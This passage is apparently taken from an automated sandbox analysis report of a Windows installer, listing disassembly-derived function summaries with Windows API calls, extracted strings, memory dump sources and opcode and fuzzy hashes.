                                                                                                                                                                              • Opcode ID: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction ID: aaa7302cbc80432ba9c6d3cc009c2f6a3e5db9f3acee5ac09d83a4ccde6d1afd
                                                                                                                                                                              • Opcode Fuzzy Hash: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction Fuzzy Hash: C7F04F71741602DFE7209F7AAC08B1676E8EF99712F244539F945E3250EB31C845CA71
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 459b9e69d198fa0aa10f426e85a8a9a0fda0477f50ffa21e79a4a28b7c5d1165
                                                                                                                                                                              • Instruction ID: 554a575f8e64b48ef56620cf1cdecd84fe584e1de509e883c2815028d1f0da13
                                                                                                                                                                              • Opcode Fuzzy Hash: 459b9e69d198fa0aa10f426e85a8a9a0fda0477f50ffa21e79a4a28b7c5d1165
                                                                                                                                                                              • Instruction Fuzzy Hash: B1D1CE71A012059FDB10EF69DC84BBEBBF8EF45310F2441A9E905E7291DBB99D04CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000000), ref: 00CAACDA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                                                                              • API String ID: 0-2319862951
                                                                                                                                                                              • Opcode ID: e3dde65f2beaeb9e5768ec9d6a56e04446ed6b7fb23a9c0bf44ce35239333e13
                                                                                                                                                                              • Instruction ID: 426aa9ecf198101c19ab60b7a9f6535b9078ce07a526a181c5cf03bba133c13f
                                                                                                                                                                              • Opcode Fuzzy Hash: e3dde65f2beaeb9e5768ec9d6a56e04446ed6b7fb23a9c0bf44ce35239333e13
                                                                                                                                                                              • Instruction Fuzzy Hash: 39D1D331A00605AFEB14CF24CC95BEEB7F1FF49304F108699E55AA72D1DB746A49CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(Advapi32.dll,E5106CA8,?,00000000), ref: 00CC7761
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CC778F
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,E5106CA8,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00BA11E6,80004005,E5106CA8,?,00DAA90F), ref: 00BAA9FA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00CC77A5
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00CC77BE
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CC77CB
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC79B9
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC7A1E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                                                                                                                                              • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                                                                                              • API String ID: 3460774402-1129428314
                                                                                                                                                                              • Opcode ID: db11c3bf66e9d273c9b2e9935a426c49aadd023e462c544fab9d578f819bc14e
                                                                                                                                                                              • Instruction ID: cdc7d3bb30cb49d0c10d8ca24c22ea7e33547cd59e4efebd0dd9b9e108aeb7f5
                                                                                                                                                                              • Opcode Fuzzy Hash: db11c3bf66e9d273c9b2e9935a426c49aadd023e462c544fab9d578f819bc14e
                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF157B1C05209AFDB10DF94C945BEEBBB4FF04310F248229E915B7290E775AA59CFA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00BDC7B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00BDC7D1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 00BDC7DD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 00BDC7EA
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,E5106CA8,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00BA11E6,80004005,E5106CA8,?,00DAA90F), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                                                                                                                                              • String ID: build $20.9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI$d71a6aa0
                                                                                                                                                                              • API String ID: 2564778481-2118497109
                                                                                                                                                                              • Opcode ID: 5bb7c95a19edc89883312135c84d6e3867f7c0cf7e1a2d0c274fe7cc9954869c
                                                                                                                                                                              • Instruction ID: 7d17eee2ebf4477023d65591a277e1b6ff18fa4f8856fac3cb5fc36f9b07aeab
                                                                                                                                                                              • Opcode Fuzzy Hash: 5bb7c95a19edc89883312135c84d6e3867f7c0cf7e1a2d0c274fe7cc9954869c
                                                                                                                                                                              • Instruction Fuzzy Hash: 04D17E7190020AAFDB04DFA4CC55BEEBBF4FF09714F14465AE815A7391EB74AA44CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00BAEEDE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEEE4
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00BAEF17
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEF1D
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00E172AC,00000000,00000000,00000000), ref: 00BAF03D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF086
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-2454113998
                                                                                                                                                                              • Opcode ID: e530c54735ffe84c9857d1c15b02269090619b693cc172bf17b5b4c7ee1a6992
                                                                                                                                                                              • Instruction ID: 87ddb64ee7b5ea7efabc44630063662377239f460908492a55eb4e34f2498939
                                                                                                                                                                              • Opcode Fuzzy Hash: e530c54735ffe84c9857d1c15b02269090619b693cc172bf17b5b4c7ee1a6992
                                                                                                                                                                              • Instruction Fuzzy Hash: 24916C30D0820AEFDB24DFA8C895BEDB7F1EF59300F248169E411B7291EB719A45CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C,E5106CA8,00000002,00000000,00DAB45D,000000FF,?,00BB5A77,00000002,00000000,E5106CA8), ref: 00BB6B3D
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB6CB3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                                                                                              • String ID: v$0$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                                              • API String ID: 3727441302-556780245
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                              • String ID: :$f$f$f$p$p$p
                                                                                                                                                                              • API String ID: 3732870572-1434680307
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,E5106CA8,000000D8,?), ref: 00CCF5A9
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00CCF91A
                                                                                                                                                                                • Part of subcall function 00CCF370: LoadStringW.USER32(000000D8,?,00000514,E5106CA8), ref: 00CCF3C6
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00CCF61B
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 00CCF8BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Init_thread_footerRead$CloseCreateHandleHeapLoadProcessString
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 1714711150-1452845052
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BBE26F
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,E5106CAA), ref: 00BBE2C3
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BBE320
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00BBE387
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00D7CF5B), ref: 00BBE3AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                                                                              • String ID: Ls$aix$html
                                                                                                                                                                              • API String ID: 2030708724-130826793
                                                                                                                                                                              APIs
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6A6
                                                                                                                                                                              • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6BB
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7F737
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                              • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                              • API String ID: 1423960858-1745123996
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA98C5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA9910
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: </a>$<a href="$<a>$Hi$Hi
                                                                                                                                                                              • API String ID: 1385522511-4214971700
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00EA1668,00000000,E5106CA8,00000000,00DE7E63,000000FF,?,E5106CA8), ref: 00BA29A3
                                                                                                                                                                              • GetLastError.KERNEL32(?,E5106CA8), ref: 00BA29AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                                                                              • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                                                                                              • API String ID: 439134102-34576578
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                                • Part of subcall function 00D7F896: IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7DB
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,00BB8164,?), ref: 00D7F802
                                                                                                                                                                              • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,00BB8164,?), ref: 00D7F816
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F829
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00BB8164,?), ref: 00D7F83C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2460949444-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,E5106CA8), ref: 00BBE491
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BBE4BA
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00BBE72E
                                                                                                                                                                              • CloseHandle.KERNEL32(?,E5106CA8,?,?,00000000,00DAC9ED,000000FF,?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000), ref: 00BBE7BE
                                                                                                                                                                              Strings
                                                                                                                                                                              • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00BBE486
                                                                                                                                                                              • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00BBE4F2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$CreateErrorEventHandleLast
                                                                                                                                                                              • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                                                                              • API String ID: 1253123496-2079760225
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1648,E5106CA8,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC5DA
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC65A
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC813
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC834
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 1807155316-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,E5106CA8,E5106CA8,?,?), ref: 00CC9806
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00CC9816
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00CC9868
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-3913318428
                                                                                                                                                                              • Opcode ID: bdbe0eba6a96933737b77f4b6a33b6aeab5a108e040166a2d2d0b6b7d094ce4e
                                                                                                                                                                              • Instruction ID: 46152b0189652b9ce2b97b76fb6270d0189884d116b7b441e7182326b50d6893
                                                                                                                                                                              • Opcode Fuzzy Hash: bdbe0eba6a96933737b77f4b6a33b6aeab5a108e040166a2d2d0b6b7d094ce4e
                                                                                                                                                                              • Instruction Fuzzy Hash: BDA15B70D04208DFDB24CF68C959B9EBBF4FF49304F20826DE455AB291DB74AA44CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00BB10F4
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB1169
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?), ref: 00BB11D9
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?), ref: 00BB11DF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,E5106CA8), ref: 00BB120C
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,E5106CA8), ref: 00BB1212
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB122A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$Heap$String$Process
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2680101141-0
                                                                                                                                                                              • Opcode ID: a3619e46d486705996b05b241b834f6a9bd8296bee0a55f51be1d6ccd7b04254
                                                                                                                                                                              • Instruction ID: 28887522562c4f1d8f4047930e1785b57de7a1e222eb5bac31a5d017fd6c25dc
                                                                                                                                                                              • Opcode Fuzzy Hash: a3619e46d486705996b05b241b834f6a9bd8296bee0a55f51be1d6ccd7b04254
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C813570D012599FDF10DFA8C954BEEBBF8EF05310F644999E510BB281D7B89A04CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C,E5106CA8,00000000,00EA69B8), ref: 00BB9C43
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9CA8
                                                                                                                                                                              • LoadCursorW.USER32(00BA0000,?), ref: 00BB9D04
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9D9B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                                                                                              • String ID: v$ATL:%p
                                                                                                                                                                              • API String ID: 2080323225-109518622
                                                                                                                                                                              • Opcode ID: ba1a1befe067dce455c1cd795d2c5ecda64cef95063d63a9be113e65ae98907a
                                                                                                                                                                              • Instruction ID: 2dbce08e59c4c7bf63173a76080c84b94452ffe40c5c9af82addf93aec82cf0e
                                                                                                                                                                              • Opcode Fuzzy Hash: ba1a1befe067dce455c1cd795d2c5ecda64cef95063d63a9be113e65ae98907a
                                                                                                                                                                              • Instruction Fuzzy Hash: C551BC71D00B44DFDB20CF69C9406AABBF0FF59320F04465EE995A3691E7B1B984CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetLastError.KERNEL32(0000000E,E5106CA8,?,?,00000000,?), ref: 00BBA16E
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BBA1AF
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BBA1CF
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BBA1F3
                                                                                                                                                                                • Part of subcall function 00D7F902: GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                                • Part of subcall function 00D7F902: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalHeapSection$AllocCurrentEnterErrorLastLeaveProcessThread
                                                                                                                                                                              • String ID: v$AXWIN UI Window
                                                                                                                                                                              • API String ID: 2176831970-2690018532
                                                                                                                                                                              • Opcode ID: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
                                                                                                                                                                              • Instruction ID: 85a2330f8fc84fe8f071a45121e54732a2bd6733231311ce1bbaffd3c28817a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
